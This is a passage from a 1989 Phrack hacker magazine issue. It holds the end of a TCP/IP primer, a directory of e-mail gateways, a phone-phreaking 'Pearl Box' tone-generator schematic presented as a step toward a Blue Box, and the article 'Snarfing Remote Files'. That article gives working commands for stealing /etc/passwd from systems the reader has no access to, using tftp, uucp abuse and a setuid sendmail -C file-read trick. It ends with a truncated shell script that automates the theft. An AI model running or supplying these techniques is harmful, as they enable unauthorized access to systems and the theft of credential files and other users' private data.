datagram, it adds its own header. The main things in this header are the source and destination Internet address (32-bit addresses, like 128.6.4.194), the protocol number, and another checksum. The source Internet address is simply the address of your machine. (This is necessary so the other end knows where the datagram came from.) The destination Internet address is the address of the other machine. (This is necessary so any gateways in the middle know where you want the datagram to go.) The protocol number tells IP at the other end to send the datagram to TCP. Although most IP traffic uses TCP, there are other protocols that can use IP, so you have to tell IP which protocol to send the datagram to. Finally, the checksum allows IP at the other end to verify that the header wasn't damaged in transit. Note that TCP and IP have separate checksums. IP needs to be able to verify that the header didn't get damaged in transit, or it could send a message to the wrong place. It is both more efficient and safer to have TCP compute a separate checksum for the TCP header and data. Once IP has tacked on its header, here's what the message looks like: +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ |Version| IHL |Type of Service| Total Length | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Identification |Flags| Fragment Offset | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Time to Live | Protocol | Header Checksum | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Source Address | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Destination Address | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | TCP header, then your data ...... | | | If you represent the IP header by an "I", your file now looks like this: IT.... IT.... IT.... IT.... IT.... IT.... IT.... Again, the header contains some additional fields that will not be discussed in this article because they are not relevent to understanding the process. The flags and fragment offset are used to keep track of the pieces when a datagram has to be split up. This can happen when datagrams are forwarded through a network for which they are too big. (This will be discussed a bit more below.) The time to live is a number that is decremented whenever the datagram passes through a system. When it goes to zero, the datagram is discarded. This is done in case a loop develops in the system somehow. Of course this should be impossible, but well-designed networks are built to cope with "impossible" conditions. At this point, it's possible that no more headers are needed. If your computer happens to have a direct phone line connecting it to the destination computer, or to a gateway, it may simply send the datagrams out on the line (though likely a synchronous protocol such as HDLC would be used, and it would add at least a few octets at the beginning and end). * The Ethernet Level Most networks these days use Ethernet which has its own addresses. The people who designed Ethernet wanted to make sure that no two machines would end up with the same Ethernet address. Furthermore, they didn't want the user to have to worry about assigning addresses. So each Ethernet controller comes with an address built-in from the factory. In order to make sure that they would never have to reuse addresses, the Ethernet designers allocated 48 bits for the Ethernet address. People who make Ethernet equipment have to register with a central authority, to make sure that the numbers they assign don't overlap any other manufacturer. Ethernet is a "broadcast medium." That is, it is in effect like an old party line telephone. When you send a packet out on the Ethernet, every machine on the network sees the packet. So something is needed to make sure that the right machine gets it. As you might guess, this involves the Ethernet header. Every Ethernet packet has a 14-octet header that includes the source and destination Ethernet address, and a type code. Each machine is supposed to pay attention only to packets with its own Ethernet address in the destination field. (It's perfectly possible to cheat, which is one reason that Ethernet communications are not terribly secure.) Note that there is no connection between the Ethernet address and the Internet address. Each machine has to have a table of what Ethernet address corresponds to what Internet address. (I will describe how this table is constructed a bit later.) In addition to the addresses, the header contains a type code. The type code is to allow for several different protocol families to be used on the same network. So you can use TCP/IP, DECnet, Xerox NS, etc. at the same time. Each of them will put a different value in the type field. Finally, there is a checksum. The Ethernet controller computes a checksum of the entire packet. When the other end receives the packet, it recomputes the checksum, and throws the packet away if the answer disagrees with the original. The checksum is put on the end of the packet, not in the header. The final result is that your message looks like this: +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Ethernet destination address (first 32 bits) | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Ethernet dest (last 16 bits) |Ethernet source (first 16 bits)| +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Ethernet source address (last 32 bits) | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Type code | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | IP header, then TCP header, then your data | | | ... | | | end of your data | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Ethernet Checksum | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ If you represent the Ethernet header with "E", and the Ethernet checksum with "C", your file now looks like this: EIT....C EIT....C EIT....C EIT....C EIT....C When these packets are received by the other end, of course all the headers are removed. The Ethernet interface removes the Ethernet header and the checksum. It looks at the type code. Since the type code is the one assigned to IP, the Ethernet device driver passes the datagram up to IP. IP removes the IP header. It looks at the IP protocol field. Since the protocol type is TCP, it passes the datagram up to TCP. TCP now looks at the sequence number. It uses the sequence numbers and other information to combine all the datagrams into the original file. This ends my initial summary of TCP/IP. There are still some crucial concepts I have not gotten to, so in part two, I will go back and add details in several areas. (For detailed descriptions of the items discussed here see, RFC 793 for TCP, RFC 791 for IP, and RFC's 894 and 826 for sending IP over Ethernet.) __________________________________________________________________ ==Phrack Inc.== Volume Three, Issue 28, File #4 of 12 Network Miscellany ~~~~~~~~~~~~~~~~~~ by Taran King June 1, 1989 ACSNET ~~~~~~ Australian Computer Science Network (ACSNET), also known as Oz, has its gateway through the CSNET node munnari.oz.au and if you cannot directly mail to the .oz.au domain, try either username%munnari.oz.au@UUNET.UU.NET or munnari!username@UUNET.UU.NET. AT&T MAIL ~~~~~~~~~ AT&T Mail is a mailing service of AT&T, probably what you might call it's MCI-Mail equivalent. It is available on the UUCP network as node name attmail but I've had problems having mail get through. Apparently, it does cost money to mail to this service and the surrounding nodes are not willing to pick up the tab for the ingoing mail, or at least, this has seemingly been the case thus far. I believe, though, that perhaps routing to att!attmail!user would work. AT&T recently announced six new X.400 interconnections between AT&T Mail and electronic mail services in the U.S., Korea, Sweden, Australia, and Finland. In the U.S., AT&T Mail is now interconnected with Telenet Communications Corporation's service, Telemail, allowing users of both services to exchange messages easily. With the addition of these interconnections, the AT&T Mail Gateway 400 Service allows AT&T Mail subscribers to exchange messages with users of the following electronic messaging systems: Company E-Mail Name* Country ------- ------------ ------- TeleDelta TeDe 400 Sweden OTC MPS400 Australia Telecom-Canada Envoy100 Canada DACOM DACOM MHS Korea P&T-Tele MailNet 400 Finland Helsinki Telephone Co. ELISA Finland Dialcom Dialcom USA Telenet Telemail USA KDD Messavia Japan Transpac ATLAS400 France The interconnections are based on the X.400 standard, a set of guidelines for the format, delivery and receipt of electronic messages recommended by an international standards committee the CCITT. International X.400 messages incur a surcharge. They are: To Canada: Per note: $.05 Per message unit: $.10 To other international locations: Per note: $.20 Per message unit: $.50 There is no surcharge for X.400 messages within the U.S. The following are contacts to speak with about mailing through these mentioned networks. Other questions can be directed through AT&T Mail's toll-free number, 1-800-624-5672. MHS Gateway: mhs!atlas MHS Gateway: mhs!dacom Administrator: Bernard Tardieu Administrator: Bob Nicholson Transpac AT&T Phone: 3399283203 Morristown, NJ 07960 Phone: +1 201 644 1838 MHS Gateway: mhs!dialcom MHS Gateway: mhs!elisa Administrator: Mr. Laraman Administrator: Ulla Karajalainen Dialcom Nokia Data South Plainfield, NJ 07080 Phone: 01135804371 Phone: +1 441 493 3843 MHS Gateway: mhs!envoy MHS Gateway: mhs!kdd Administrator: Kin C. Ma Administrator: Shigeo Lwase Telecom Canada Kokusai Denshin Denwa CO. Phone: +1 613 567 7584 Phone: 8133477419 MHS Gateway: mhs!mailnet MHS Gateway: mhs!otc Administrator: Kari Aakala Administrator: Gary W. Krumbine Gen Directorate Of Post & AT&T Information Systems Phone: 35806921730 Lincroft, NJ 07738 Phone: +1 201 576 2658 MHS Gateway: mhs!telemail MHS Gateway: mhs Administrator: Jim Kelsay Administrator: AT&T Mail MHS GTE Telenet Comm Corp Gateway Reston, VA 22096 AT&T Phone: +1 703 689 6034 Lincroft, NJ 08838 Phone: +1 800 624 5672 CMR ~~~ Previously known as Intermail, the Commercial Mail Relay (CMR) Service is a mail relay service between the Internet and three commercial electronic mail systems: US Sprint/Telenet, MCI-Mail, and DIALCOM systems (i.e. Compmail, NSFMAIL, and USDA-MAIL). An important note: The only requirement for using this mail gateway is that the work conducted must be DARPA sponsored research and other approved government business. Basically, this means that unless you've got some government-related business, you're not supposed to be using this gateway. Regardless, it would be very difficult for them to screen everything that goes through their gateway. Before I understood the requirements of this gateway, I was sending to a user of MCI-Mail and was not contacted about any problems with that communication. Unfortunately, I mistyped the MCI-Mail address on one of the letters and that letter ended up getting read by system administrators who then informed me that I was not to be using that system, as well as the fact that they would like to bill me for using it. That was an interesting thought on their part anyway, but do note that using this service does incur charges. The CMR mailbox address in each system corresponds to the label: Telemail: [Intermail/USCISI]TELEMAIL/USA MCI-Mail: Intermail or 107-8239 CompMail: Intermail or CMP0817 NSF-Mail: Intermail or NSF153 USDA-Mail: Intermail or AGS9999 Addressing examples for each e-mail system are as follows: MCIMAIL: 123-4567 seven digit address Everett T. Bowens person's name (must be unique!) COMPMAIL: CMP0123 three letters followed by three or four digits S.Cooper initial, then "." and then last name 134:CMP0123 domain, then ":" and then combination system and account number NSFMAIL: NSF0123 three letters followed by three or four digits A.Phillips initial, then "." and then last name 157:NSF0123 domain, then ":" and then combination system and account number USDAMAIL: AGS0123 three letters followed by three or four digits P.Shifter initial, then "." and then last name 157:AGS0123 domain, then ":" and then combination system and account number TELEMAIL: BARNOC user (directly on Telemail) BARNOC/LODH user/organization (directly on Telemail) [BARNOC/LODH]TELEMAIL/USA [user/organization]system branch/country The following are other Telenet system branches/countries that can be mailed to: TELEMAIL/USA NASAMAIL/USA MAIL/USA TELEMEMO/AUSTRALIA TELECOM/CANADA TOMMAIL/CHILE TMAILUK/GB ITALMAIL/ITALY ATI/JAPAN PIPMAIL/ROC DGC/USA FAAMAIL/USA GSFC/USA GTEMAIL/USA TM11/USA TNET.TELEMAIL/USA USDA/USA Note: OMNET's ScienceNet is on the Telenet system MAIL/USA and to mail to it, the format would be [A.MAILBOX/OMNET]MAIL/USA. The following are available subdivisions of OMNET: AIR Atmospheric Sciences EARTH Solid Earth Sciences LIFE Life Sciences OCEAN Ocean Sciences POLAR Interdisciplinary Polar Studies SPACE Space Science and Remote Sensing The following is a list of DIALCOM systems available in the listed countries with their domain and system numbers: Service Name Country Domain Number System Number ~~~~~~~~~~~~ ~~~~~~~ ~~~~~~~~~~~~~ ~~~~~~~~~~~~~ Keylink-Dialcom Australia 60 07, 08, 09 Dialcom Canada 20 20, 21, 22, 23, 24 DPT Databoks Denmark 124 71 Telebox Finland 127 62 Telebox West Germany 30 15, 16 Dialcom Hong Kong 80 88, 89 Eirmail Ireland 100 74 Goldnet Israel 50 05, 06 Mastermail Italy 130 65, 67 Mastermail Italy 1 66, 68 Dialcom Japan 70 13, 14 Dialcom Korea 1 52 Telecom Gold Malta 100 75 Dialcom Mexico 1 52 Memocom Netherlands 124 27, 28, 29 Memocom Netherlands 1 55 Starnet New Zealand 64 01, 02 Dialcom Puerto Rico 58 25 Telebox Singapore 88 10, 11, 12 Dialcom Taiwan 1 52 Telecom Gold United Kingdom 100 01, 04, 17, 80-89 DIALCOM USA 1 29, 30, 31, 32, 33, 34, 37, 38, 41-59, 61, 62, 63, 90-99 NOTE: You can also mail to username@NASAMAIL.NASA.GOV or username@GSFCMAIL.NASA.GOV instead of going through the CMR gateway to mail to NASAMAIL or GSFCMAIL. For more information and instructions on how to use CMR, send a message to the user support group at intermail-request@intermail.isi.edu (you'll get basically what I've listed plus maybe a bit more). Please read Chapter 3 of The Future Transcendent Saga (Limbo to Infinity) for specifics on mailing to these destination mailing systems. COMPUSERVE ~~~~~~~~~~ CompuServe is well known for its games and conferences. It does, though, have mailing capability. Now, they have developed their own Internet domain, called COMPUSERVE.COM. It is relatively new and mail can be routed through either TUT.CIS.OHIO-STATE.EDU or NORTHWESTERN.ARPA. Example: user%COMPUSERVE.COM@TUT.CIS.OHIO-STATE.EDU or replace TUT.CIS.OHIO-STATE.EDU with NORTHWESTERN.ARPA). The CompuServe link appears to be a polled UUCP connection at the gateway machine. It is actually managed via a set of shell scripts and a comm utility called xcomm, which operates via command scripts built on the fly by the shell scripts during analysis of what jobs exist to go into and out of CompuServe. CompuServe subscriber accounts of the form 7xxxx,yyyy can be addressed as 7xxxx.yyyy@compuserve.com. CompuServe employees can be addressed by their usernames in the csi.compuserve.com subdomain. CIS subscribers write mail to ">inet:user@host.domain" to mail to users on the Wide-Area Networks, where ">gateway:" is CompuServe's internal gateway access syntax. The gateway generates fully-RFC-compliant headers. To fully extrapolate -- from the CompuServe side, you would use their EasyPlex mail system to send mail to someone in BITNET or the Internet. For example, to send me mail at my Bitnet id, you would address it to: INET:C488869%UMCVMB.BITNET@CUNYVM.CUNY.EDU Or to my Internet id: INET:C488869@UMCVMB.MISSOURI.EDU Now, if you have a BITNET to Internet userid, this is a silly thing to do, since your connect time to CompuServe costs you money. However, you can use this information to let people on CompuServe contact YOU. CompuServe Customer Service says that there is no charge to either receive or send a message to the Internet or BITNET. DASNET ~~~~~~ DASnet is a smaller network that connects to the Wide-Area Networks but charges for their service. DASnet subscribers get charged for both mail to users on other networks AND mail for them from users of other networks. The following is a brief description of DASnet, some of which was taken from their promotional text letter. DASnet allows you to exchange electronic mail with people on more than 20 systems and networks that are interconnected with DASnet. One of the drawbacks, though, is that, after being subscribed to these services, you must then subscribe to DASnet, which is a separate cost. Members of Wide-Area networks can subscribe to DASnet too. Some of the networks and systems reachable through DASnet include the following: ABA/net, ATT Mail, BIX (Byte Information eXchange), DASnet Network, Dialcom, EIES, EasyLink, Envoy 100, FAX, GeoMail, INET, MCI Mail, NWI, PeaceNet/EcoNet, Portal Communications, The Meta Network, The Source, Telemail, ATI's Telemail (Japan), Telex, TWICS (Japan), UNISON, UUCP, The WELL, and Domains (i.e. ".COM" and ".EDU" etc.). New systems are added all of the time. As of the writing of this file, Connect, GoverNET, MacNET, and The American Institute of Physics PI-MAIL are soon to be connected. You can get various accounts on DASnet including: o Corporate Accounts -- If your organization wants more than one individual subscription. o Site Subscriptions -- If you want DASnet to link directly to your organization's electronic mail system. To send e-mail through DASnet, you send the message to the DASnet account on your home system. You receive e-mail at your mailbox, as you do now. On the Wide-Area Networks, you send mail to XB.DAS@STANFORD.BITNET. On the Subject: line, you type the DASnet address in brackets and then the username just outside of them. The real subject can be expressed after the username separated by a "!" (Example: Subject: [0756TK]randy!How's Phrack?). The only disadvantage of using DASnet as opposed to Wide-Area networks is the cost. Subscription costs as of 3/3/89 cost $4.75 per month or $5.75 per month for hosts that are outside of the U.S.A. You are also charged for each message that you send. If you are corresponding with someone who is not a DASnet subscriber, THEIR MAIL TO YOU is billed to your account. The following is an abbreviated cost list for mailing to the different services of DASnet: PARTIAL List DASnet Cost DASnet Cost of Services 1st 1000 Each Add'l 1000 Linked by DASnet (e-mail) Characters Characters: INET, MacNET, PeaceNet, NOTE: 20 lines Unison, UUCP*, Domains, .21 .11 of text is app. e.g. .COM, .EDU* 1000 characters. Dialcom--Any "host" in U.S. .36 .25 Dialcom--Hosts outside U.S. .93 .83 EasyLink (From EasyLink) .21 .11 (To EasyLink) .55 .23 U.S. FAX (internat'l avail.) .79 .37 GeoMail--Any "host" in U.S. .21 .11 GeoMail--Hosts outside U.S. .74 .63 MCI (from MCI) .21 .11 (to MCI) .78 .25 (Paper mail - USA) 2.31 .21 Telemail .36 .25 W.U. Telex--United States 1.79 1.63 (You can also send Telexes outside the U.S.) TWICS--Japan .89 .47 * The charges given here are to the gateway to the network. The DASnet user is not charged for transmission on the network itself. Subscribers to DASnet get a free DASnet Network Directory as well as a listing in the directory, and the ability to order optional DASnet services like auto-porting or DASnet Telex Service which gives you your own Telex number and answerback for $8.40 a month at this time. DASnet is a registered trademark of DA Systems, Inc. DA Systems, Inc. 1503 E. Campbell Ave. Campbell, CA 95008 408-559-7434 TELEX: 910 380-3530 The following two sections on PeaceNet and AppleLink are in association with DASnet as this network is what is used to connect them to the Wide-Area Networks. APPLELINK ~~~~~~~~~ AppleLink is a service of Apple Computer. They have their own little network and there are a couple of things to know about it. First of all, there is an AppleLink-Bitnet Mail Relay which was created to "enrich the cooperative research relationship of Apple Computer and the higher education community by facilitating the electronic exchange of information." Any Bitnet user is automatically authorized to use the mail relay as well as all AppleLink users. To send to AppleLink from Bitnet, your header should be as follows: To: XB.DAS@STANFORD.BITNET Subject: username@APPLELINK!Hi, how are things at Apple? The username is the user's ID that you are sending to and the "!" separates the DASnet To: field from the real subject. To send to Bitnet from AppleLink, your header should be as follows: To: DASNET Subject: C488869@UMCVMB.BITNET!Please add me to the Phrack Subscription List. The C488869@UMCVMB.BITNET (my address) is any Bitnet address and as above, the "!" separates the address from the subject of the message. There is one other thing to mention. Apparently, sending to username@APPLELINK.APPLE.COM also will perform the same function. If this does not work, try routing to username%APPLELINK.APPLE.COM@APPLE.COM. PEACENET ~~~~~~~~ PeaceNet is a computer-based communication system "helping the peace movement throughout the world communicate and cooperate more effectively and efficiently," according to their information flier. It is networked through Telenet and can be reached via dial-up. To subscribe to this service, it costs $10 to sign up. With this sign-up fee, you receive a user's manual and a "free" hour of off-peak computer time (which is weekday evenings, weekends, and holidays). Beyond this, you pay a monthly $10 fee for another hour of off-peak computer usage and you pay $5 for additional PEAK hour usage. They charge, also, for users who require extra space on their system. I guess peace carries a heavy cost in the long run! You do get 2 free hours of off-peak time though for every additional user you bring to PeaceNet. It is a project of the Tides Foundation, a San Franciscan public charity, and is managed by 3 national peace organizations (non-profit, of course!). Anyway, to join PeaceNet, send your name, organizational affiliation, address, city, state, zip code, telephone number, and who referred you to PeaceNet as well as your credit card number with expiration date (and the name on the card if it's different than yours) to PeaceNet, 3228 Sacramento Street, San Francisco, CA 94115 or call them at 415-923-0900. You can also pay by check but that requires a $50 deposit. FIDONET ~~~~~~~ FIDONET is, of course, the ever-popular group of IBM bulletin boards that made it possible for networking to be incorporated into bulletin board systems. FIDONET seems to have a number of gateways in the Wide-Area Networks. First of all, it has its own domain -- .ifna.org -- which makes it possible to mail right to FIDONET without routing through UUCP gateways or whatever. The format for this gateway is: Username@f.n.z.ifna.org In other words, if I wanted to mail to Silicon Swindler at 1:135/5, the address would be Silicon_Swindler@f5.n135.z1.ifna.org and, provided that your mailer knows the .ifna.org domain, it should get through alright. Apparently, as of the writing of this article, they have implemented a new gateway name called fidonet.org which should work in place of ifna.org in all routings. If your mailer does not know either of these domains, use the above routing but replace the first "@" with a "%" and then afterwards, use either of the following mailers after the "@": CS.ORST.EDU or K9.CS.ORST.EDU (i.e. username%f.n.z.fidonet.org@CS.ORST.EDU [or replace CS.ORST.EDU with K9.CS.ORST.EDU]). The following is a list compiled by Bill Fenner (WCF@PSUECL.BITNET) that was posted on INFONETS DIGEST which lists a number of FIDONET gateways: Net Node Node Name ~~~ ~~~~ ~~~~~~~~~ 104 56 milehi.ifna.org 105 55 casper.ifna.org 107 320 rubbs.ifna.org 109 661 blkcat.ifna.org 125 406 fidogate.ifna.org 128 19 hipshk.ifna.org 129 65 insight.ifna.org 143 N/A fidogate.ifna.org 152 200 castle.ifna.org 161 N/A fidogate.ifna.org 369 17 megasys.ifna.org NOTE: The UUCP equivalent node name is the first part of the node name. In other words, the UUCP node milehi is listed as milehi.ifna.org but can be mailed directly over the UUCP network. Another way to mail to FIDONET, specifically for Internet people, is in this format: ihnp4!necntc!ncoast!ohiont!!!user_name@husc6.harvard.edu And for those UUCP mailing people out there, just use the path described and ignore the @husc5.harvard.edu portion. There is a FIDONET NODELIST available on most any FIDONET bulletin board, but it is quite large. ONTYME ~~~~~~ Previously known as Tymnet, OnTyme is the McDonnell Douglas revision. After they bought out Tymnet, they renamed the company and opened an experimental Internet gateway at ONTYME.TYMNET.COM but this is supposedly only good for certain corporate addresses within McDonnell Douglas and Tymnet, not their customers. The userid format is xx.yyy or xx.y/yy where xx is a net name and yyy (or y/yy) is a true username. If you cannot directly nail this, try: xx.yyy%ONTYME.TYMNET.COM@TYMIX.TYMNET.COM A subnet of Tymnet is called GeoNet. It is a private X.25-based subnet that is operated by the U.S. Geological Survey, a bureau of the U.S. Department of the Interior. It supports about 165 host computers including about 75 USGS Primes, 50 VAXen, and 2 Amdahls. One of their VAX systems is on BITnet at USGSRESV and they have SPAN nodes at IFLAG1.SPAN and EROSA.SPAN. THENET ~~~~~~ The Texas Higher Education Network (THEnet) is comprised of many of the institutions of higher education in the state of Texas. Its backbone network protocol is DECnet. THEnet has recently been designated as an NSF regional network, distributing Internet Protocol (IP) access over DECnet in some cases and utilizing multi-protocol routers in others. THEnet has a NIC (Network Information Center) at THENIC.THE.NET and addresses within THEnet are probably routed to user@destination.THE.NET. UUCP PATHS AND NODE INFORMATION ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Many UUCP Unix nodes have the commands uuhosts and uupath. The uuhosts command allows you to receive information about a specified UUCP node such as the path, node contact, how it is polled for USENET feeds, etc. The uupath command simply tells you the path from one UUCP node to another. Well, although at this time, this is only good for Bitnet users, this interactive message feature is good to know just in case you need to know a path to a particular node. For IBM systems using RSCS network software, use the command SM RSCS CMD PSUVAX1 UUPATH node1 node2 ... (For people on VAXen with JNET network software, the format is: ) (SEND/COMMAND PSUVAX1 UUPATH node1 ) to receive standard information listed above from the uupath command. Multiple nodes can be listed where node1 node2 represent separate UUCP nodes. I've found that this can be useful in finding surrounding nodes of the destination node in case you have a problem mailing through a particular path or node. You can, with this command, use alternate routings by specifying them with a "bang-path" that will indicate to the UUCP gateway where the message is to be sent to next. This is in the format of, say, "psuvax1!catch22!msp!taran@UUCPGATE" or whatever where UUCPGATE can be any UUCP gateway such as PSUVAX1 or UUNET.UU.NET to name a few. NICS ~~~~ The Network Information Centers (NICs) can be extremely useful in figuring out various problems on the networks, such as routings or the place at which the node resides, etc. BITNIC is the BITnet Network Information Center which is located in New Jersey. Its node name is BITNIC.BITNET and it contains a variety of resources which can be utilized via mail or via direct messages from Bitnet users. The DATABASE@BITNIC contains lists of all kinds. This database does not limit itself to information about the networks. It does contain this information, but also holds various trivialities. Send the HELP command either via direct message to DATABASE@BITNIC if on Bitnet or send mail to that address containing the command you wish to perform (i.e. send a message saying HELP to DATABASE@BITNIC.BITNET from another network or from Bitnet if you're at a node without direct message capabilities). LISTSERV@BITNIC contains the standard listserver files that you'd expect to find plus some other interesting ones. I'm not going to take the time to tutor you, the reader, in using these, so just send a HELP command the same as you would to DATABASE@BITNIC for more information. NETSERV@BITNIC is a file server which contains information files pertaining to various networks that are connected to Bitnet, as well as files about Bitnet. From here, you can get network node lists, information files on networks such as SPAN, ARPANET, NETNORTH, etc. and other network related files. This can be an extremely useful resource when you're trying to mail someone at another network. The Data Defense Network NIC (DDN NIC) is located at SRI-NIC.ARPA and has various useful files about the DDN as well as the Internet. There are a number of ways to obtain information from the DDN NIC. First of all, people on the Internet with the Telnet capability can Telnet to SRI-NIC.ARPA and perform a number of procedures from the pre-login screen. First of all, you can get TAC News updates by typing TACNEWS. The NIC command allows you to find various facts about the whereabouts of network information files, etc. The WHOIS command is probably the most useful of these 3. The WHOIS program allows you to find addresses for registered users of the networks as well as information about networks and nodes on the networks, depending on what you ask the WHOIS program for. To find only a certain record type, you can use the following specifiers: Arpanet DOmain GAteway GRoup HOst IMp Milnet NEtwork Organization PSn TAc To search for a specific field, use the following specifiers: HAndle or "!" Mailbox or if it contains "@" NAme or a "." leading These features return whatever information is available from the DDN NIC database. If you do not have the capability to use Telnet, mail can be sent to SERVICE@SRI-NIC.ARPA with the "SUBJECT:" line containing the following commands: HELP This will send you a help file for using the DDN NIC. RFC nnn This sends you a Request For Comments file (where nnn is either the number of the RFC file or else is INDEX to list them). IEN nnn This sends you an Internet Engineering Notes file where nnn is the same as above. NETINFO xxx This feature allows you to get files about the networks where xxx is the filename or else the word INDEX for a list of available files. HOST xxx This returns information pertaining to the xxx host specified. WHOIS xxx This is the same as using the WHOIS command from Telnet. For details on how to use this, send the WHOIS HELP command on the "Subject:" line. There are other Network Information Centers throughout the networks but as far as I know, their abilities are nothing near as powerful as SRI-NIC.ARPA. They are the places, though, to mail to for answers concerning those networks if you have some question as to the workings of the network or anything else. _______________________________________________________________________________ ==Phrack Inc.== Volume Three, Issue 28, File #5 of 12 /////////////////////\\\\\\\\\\\\\\\\\\\\\ || || || A Real Functioning PEARL BOX Schematic || || || || Written, Tested, and Used || || || || by Dispater || || || || July 1, 1989 || || || \\\\\\\\\\\\\\\\\\\\\///////////////////// Introduction: After reading the earlier renditions of schematics for the Pearl Box, I decided that there was an easier and cheaper way of doing the same thing with an IC and parts you probably have just laying around the house. What Is A Pearl Box and Why Do I Want One? A Pearl Box is a tone generating device that is used to make a wide range of single tones. Therefore, it would be very easy to modify this basic design to make a Blue Box by making 2 Pearl Boxes and joining them together in some fashion. A Pearl Box can be used to create any tone you wish that other boxes may not. It also has a tone sweep option that can be used for numerous things like detecting different types of phone tapping devices. Parts List: CD4049 RCA integrated circuit .1 uF disk capacitor 1 uF 16V electrolitic capacitor 1K resistor 10M resistor 1meg pot 1N914 diode Some SPST momentary push-button switches 1 SPDT toggle switch 9 Volt battery & clip and miscellaneous stuff you should have laying around the house. State-of-the-Art-Text Schematic: + 16V 1uF - _______________________________||_____ | ! ! || | _ | _______________________ |__________| |/| 8ohms ____|__|_____:__|__:__|_ | __________| | | | 9 10 11 12 13 14 15 16 | | | |_|\| | CD4049UBE | | | |_1__2__3__4__5__6__7__8_| : | _ | | |__| |__| | |____________________|_________[-] | | ! ! : [b] | |__________________________| [a] | : : | [t] | ! 1N914 ! ! [t] |___________|/|_____________________________________[+] : |\| : : | | | | 10M | | |___/\/\/\__| | | | | |_____||____| | <-- These 2 wires to the center pole || | | of switch. .1uF 50V | | | | _______________________| |_____________________________ | ___[Toggle Switch]____________ | | | | ___ | | | | o o | | | | /\/\/\___| |__| |_/\/\/\____/\/\/\ | | ^ | 1K ^ | |____| ___ | |___| | o o | | /\/\/\___| |__| (pot side) (push-button | ^ side) |__| Explanation: The 2 wires that lead from the main part of the circuit should be connected to the center poles on the toggle switch. Put the 2 wires to the pot on one side and the 2 wires going to the push-buttons to the other side. That way you can switch between tone sweep and the favorite tones you like (the push-button side). To keep tones that you want to use frequently like 1850 Hz then all you have to do is put in a variable resistor and adjust it to where you have the correct tone, then just put a push-button switch on the line. You can link them together in a chain, etc. There are many other good modifications to make to the box so have fun and be smart. --Dispater \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\?/////////////////////////////////////// ==Phrack Inc.== Volume Three, Issue 28, File #6 of 12 +++++++++++++++++++++++++++++++++++++ + + + Snarfing Remote Files + + + + by + + + + Dark OverLord + + + +++++++++++++++++++++++++++++++++++++ There are many ways of getting copies of files from a remote system that you do not have permission to read or an account on login on to and access them through. Many administrators do not even bother to restrict many access points that you can use. Here are the simplest ways: A) Use uucp(1) [Trivial File Transfer Protocol] to retrieve a copy of a file if you are running on an Internet based network. B) Abuse uucp(1) [Unix to Unix Copy Program] to retrieve a copy of a file if uucp connections are running on that system. C) Access one of many known security loopholes. In the following examples, we will use the passwd file as the file to acquire since it is a readable file that can be found on most systems that these attacks are valid on. Method A : 1) First start the tftp program: Enter the command: tftp [You have the following prompt:] tftp> 2) The next step is to connect to the system that you wish to retrieve files from. At the tftp, type: tftp> connect other.system.com 3) Now request the file you wish to get a copy of (in our case, the passwd file /etc/passwd ): tftp> get /etc/passwd /tmp/passwd [You should see something that looks like the following:] Received 185659 bytes in 22 seconds. 4) Now exit the tftp program with the "quit" command: tftp> quit You should now have a copy of other.system.com's passwd file in your directory. NOTE: Some Unix systems' tftp programs have a different syntax. The above was tested under SunOS 4.0 For example, on Apollos, the syntax is: tftp -{g|g!|p|r|w} [netascii|image] Thus you must use the command: tftp -g password_file networked-host /etc/passwd Consult your local "man" pages for more info (or in other words RTFM). At the end of this article, I will include a shell script that will snarf a password file from a remote host. To use it type: gpw system_name Method B : Assuming we are getting the file /etc/passwd from the system uusucker, and our system has a direct uucp connection to that system, it is possible to request a copy of the file through the uucp links. The following command will request that a copy of the passwd file be copied into uucp's home directory /usr/spool/uucppublic : uucp -m uusucker!/etc/passwd '>uucp/uusucker_passwd' The flag "-m" means you will be notified by mail when the transfer is completed. Method C: The third possible way to access the desired file requires that you have the login permission to the system. In this case we will utilize a well-known bug in Unix's sendmail daemon. The sendmail program has and option "-C" in which you can specify the configuration file to use (by default this file is /usr/lib/sendmail.cf or /etc/sendmail.cf). It should also be noted that the diagnostics outputted by sendmail contain the offending lines of text. Also note that the sendmail program runs setuid root. The way you can abuse this set of facts (if you have not yet guessed) is by specifying the file you wish read as the configuration file. Thus the command: sendmail -C/usr/accounts/random_joe/private/file Will give you a copy of random joe's private file. Another similar trick is to symlink your .mailcf file to joe's file and mail someone. When mail executes sendmail (to send the mail), it will load in your .mailcf and barf out joe's stuff. First, link joe's file to your .mailcf . ln -s /usr/accounts/random_joe/private/file $HOME/.mailcf Next, send mail to someone. mail C488869@umcvmb.missouri.edu And have fun. -=-Cut Here=-=-=-Cut Here=-=-=- gpw.sh =-=-=-Cut Here=-=-=-=-Cut Here=-=-=-=-= : : gpw copyright(c) Dark Overlord : /usr/ucb/tftp $1 << EOF mode ascii verbose trace get /etc/passwd /tmp/pw.$1 quit EOF -=-Cut 